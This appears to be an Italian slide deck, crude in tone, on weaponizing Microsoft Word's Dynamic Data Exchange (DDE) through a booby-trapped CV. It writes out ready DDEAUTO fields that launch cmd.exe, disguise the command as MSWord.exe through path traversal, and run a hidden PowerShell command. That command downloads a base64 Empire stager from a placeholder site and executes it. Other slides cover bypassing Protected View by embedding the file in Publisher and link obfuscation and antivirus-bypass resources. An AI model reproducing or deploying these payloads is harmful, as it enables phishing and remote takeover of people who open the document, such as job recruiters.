EXPLOITING
MICROSOFT'S
WONTFIX

 

SUITE OFFICE

Funzionalità avanzate per il vostro curriculum!!1

Microsoft Word

Il migliore software per i vostri curriculum

Microsoft Word

Microsoft Dynamic Data Exchange (DDE) 

Niente a che vedere con le macro (troppo facile)

Microsoft Word

Microsoft Dynamic Data Exchange (DDE) 

IN BREVE

NA CACATA PER LO SCAMBIO DI DATI FRA APPLICAZIONI

Microsoft Word

Microsoft Dynamic Data Exchange (DDE) 

SINTASSI TIPICA: 

{ DDEAUTO Excel "lavori.xlsx" soldi }

DDETYPE APP "FILE" "CAMPO"

Microsoft Word

Microsoft Dynamic Data Exchange (DDE) 

SINTASSI CHE CI PIACE: 

{DDEAUTO c:\\windows\\system32\\cmd.exe "/k calc.exe" }

COSA SUCCEDE SE USIAMO QUESTA DDE? PROVIAMOLO INSIME!!

Microsoft Word

Microsoft Dynamic Data Exchange (DDE) 

DUE PROMT PER POSSEDERTI

1

2

Microsoft Word

Microsoft Dynamic Data Exchange (DDE) 

IL SECONDO PROMPT NON E' BELLO POSSIAMO FARE DI MEGLIO!

miglioriamo la DDE del nostro curriculum!

Porcodio si vede cmd.exe eh!

Microsoft Word

Microsoft Dynamic Data Exchange (DDE) 

LE PATH QUELLE BELLE!

C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\calc.exe

Microsoft Word

Microsoft Dynamic Data Exchange (DDE) 

UNA DDE PLAUSIBILE PER IL FUTURO DATORE DI LAVORO

{ DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\cmd.exe /c calc" "for security reasons"}

BEH ORA CI CHIEDE SE VOGLIAMO FAR PARTIRE MSWORD.EXE  PARE LEGITTIMO E LO E'!

Microsoft Word

Microsoft Dynamic Data Exchange (DDE) 

SI BELLO, MA CHE ME NE FACCIO DI UNA CALCOLATRICE?

WEAPONIZZIAMOLO COME PIACE DIRE A QUALCUNO!

Microsoft Word

DOCUMENT PAYLOAD!

METASPLOIT? METERPRETER?

nahhhh siete dei vecchi demmerda!!!

Microsoft Word

DOCUMENT PAYLOAD!

DA OGGI PER LA POST EXPLOITATION! SI USA
POWERSHELL EMPIRE!!1

l33tz h4x000000red!!

EMPIRE 

CONFIGURIAMO L'ASCOLTATORE (LISTENER)

EMPIRE 

CONFIGURIAMO IL LANUNCHER/STAGER/STOCAZZO

Carichiamo il base64 su un file txt, anche pastebin volendo!

EMPIRE 

LA NOSTRA DDE! PER IL CURRICULUM"

{DDEAUTO "C:\\Programs\\Microsoft\\Office\\MSWord.exe\\..\\..\\..\\..\\windows\\system32\\WindowsPowerShell\\v1.0\\powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://iltuosito.tld/fuck.txt');powershell -enc $e # "
"for security reasons" }

Esecuzione tramite powershell dell'launcher: powershell.exe -NoP -sta -NonI -W Hidden $e=(New-Object System.Net.WebClient).DownloadString('http://iltuosito.tld/fuck.txt');powershell -enc $e #

WORD + EMPIRE

LES'T DO IT!

WORD + EMPIRE

TIME TO TROLLSPLOIT ALL THE NIGHT!

PROTECTED VIEW

MALEDETTO ROVINA DIVERTIMENTI

SE IL NOSTRO CURRICULIM PASSA DALLA RETE, ALLEGATO EMAIL, DOWNLOAD ,ETC
LE NOSTRE DDE VENGONO BLOCCATE DA PROTECTED VIEW

BYPASS PROTECTED VIEW

HOW?!?!?!!?!?!?

CON IL SOFTWARE OFFICE CHE TUTTI DIMENTICANO MA CHE TUTTI CONOSCONO!

Microsoft compresa.

EMBEDDANDO IL DOCX IN PUBLISHER IL DIVERTIMENTO CONTINUA

publisher non è soggetto a protected view... non so perchè ma questo è molto bello

MICROSOFT PUBLISHER

il miglior software di delivery per il vostro curriculm weaponizzato!

LES'T TRY IT

OBFUSCATOR

 

https://github.com/0xdeadbeefJERKY/Office-DDE-Payloads

EASY PEASY!

NEXT BEST WONT'FIX? 

ILLUSION GAP – ANTIVIRUS BYPASS 

https://www.cyberark.com/threat-research-blog/illusion-gap-antivirus-bypass-part-1/

DOMANDE?

Made with Slides.com